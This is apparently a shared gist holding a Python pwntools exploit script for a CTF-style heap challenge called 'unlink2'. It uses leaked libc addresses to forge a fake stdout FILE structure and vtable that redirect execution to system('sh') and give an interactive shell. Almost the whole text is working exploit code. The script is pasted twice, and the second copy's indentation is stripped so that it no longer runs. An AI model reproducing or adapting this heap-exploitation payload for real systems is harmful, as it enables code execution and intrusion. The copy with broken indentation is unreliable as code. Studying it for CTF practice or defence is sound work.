Jinmo/unlink2.py Secret

## unlink2.py
from pwn import *
import os

def parse(x):
        x = x.strip()
        print x
        x = x.split(': ')[1]
        x = int(x, 16)
        return x

local = True

if local:
	# p = remote('0.0.0.0', 31337)
	p = process('/media/sf_j/unlink2')
else:
	p = process('/home/christmas1/unlink2')

p.recvuntil('0x')
h = int(p.recvuntil(',', drop=True), 16)
p.recvuntil(': 0x')
system = int(p.recvuntil('.', drop=True), 16)
if local:
	free_hook = system + 0x380418
	libc_base = system - 0x45390
	stdin = libc_base + 0x3c38e0
	stdout = libc_base + 0x3c4620
	gets = libc_base + 0x6ed80
	lock = libc_base + 0x3c5780
	wide_data = libc_base + 0x3c37a0
else:
	free_hook = system + 0x380428
	libc_base = system - 0x45380
	stdin = system + 0x3c38e0
	stdout = system + 0x3c4620
	gets = libc_base + 0x6ecc0
	lock = libc_base + 0x3c5780
	wide_data = libc_base + 0x3c37a0

print hex(h)
print hex(system)
jumplist = ''.join(p64(i * 0x1000) for i in range(100)).replace(p64(0x5000), p64(gets)).replace(p64(0x6000), p64(system))
payload = p64(0) + p64(0x21) + p64(stdout + 216 - 8) + p64(h + 8 * 4) + jumplist
obj = 'sh'.ljust(8, '\x00') + p64(stdout + 213) * 7 + p64(stdout + 214) + p64(0) * 4 + p64(stdin) + p64(1) + p64(0xffffffffffffffff)
obj += p64(0x0000000009000000) + p64(lock) + p64(0xffffffffffffffff) + p64(0) + p64(wide_data) + p64(0) * 3 + p64(0xffffffff) + p64(0) * 2 + p64(h + 8 * 4 + 8)
if '\n' in obj:
	exit()
p.writeline(payload)
p.writeline(obj)

p.interactive()
	from pwn import *
	import os

	def parse(x):
	x = x.strip()
	print x
	x = x.split(': ')[1]
	x = int(x, 16)
	return x

	local = True

	if local:
	# p = remote('0.0.0.0', 31337)
	p = process('/media/sf_j/unlink2')
	else:
	p = process('/home/christmas1/unlink2')

	p.recvuntil('0x')
	h = int(p.recvuntil(',', drop=True), 16)
	p.recvuntil(': 0x')
	system = int(p.recvuntil('.', drop=True), 16)
	if local:
	free_hook = system + 0x380418
	libc_base = system - 0x45390
	stdin = libc_base + 0x3c38e0
	stdout = libc_base + 0x3c4620
	gets = libc_base + 0x6ed80
	lock = libc_base + 0x3c5780
	wide_data = libc_base + 0x3c37a0
	else:
	free_hook = system + 0x380428
	libc_base = system - 0x45380
	stdin = system + 0x3c38e0
	stdout = system + 0x3c4620
	gets = libc_base + 0x6ecc0
	lock = libc_base + 0x3c5780
	wide_data = libc_base + 0x3c37a0

	print hex(h)
	print hex(system)
	jumplist = ''.join(p64(i * 0x1000) for i in range(100)).replace(p64(0x5000), p64(gets)).replace(p64(0x6000), p64(system))
	payload = p64(0) + p64(0x21) + p64(stdout + 216 - 8) + p64(h + 8 * 4) + jumplist
	obj = 'sh'.ljust(8, '\x00') + p64(stdout + 213) * 7 + p64(stdout + 214) + p64(0) * 4 + p64(stdin) + p64(1) + p64(0xffffffffffffffff)
	obj += p64(0x0000000009000000) + p64(lock) + p64(0xffffffffffffffff) + p64(0) + p64(wide_data) + p64(0) * 3 + p64(0xffffffff) + p64(0) * 2 + p64(h + 8 * 4 + 8)
	if '\n' in obj:
	exit()
	p.writeline(payload)
	p.writeline(obj)

	p.interactive()